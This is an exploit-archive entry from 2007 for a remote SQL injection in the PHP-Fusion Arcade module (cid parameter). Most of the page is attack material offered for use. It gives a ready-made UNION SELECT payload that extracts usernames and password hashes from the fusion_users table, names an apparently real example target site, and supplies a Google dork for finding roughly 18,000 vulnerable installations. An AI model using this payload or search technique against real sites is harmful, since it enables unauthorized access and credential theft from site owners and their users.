[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection Vulnerability
# Published : 2007-04-02
# Author : xoron
# Previous Title : Joomla Component Car Manager <= 1.1 Remote SQL Injection Exploit
# Next Title : Really Simple PHP and Ajax (RSPA) 2007-03-23 RFI Vulnerability
--------------------------------
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# www.Syue.com [2007-04-02]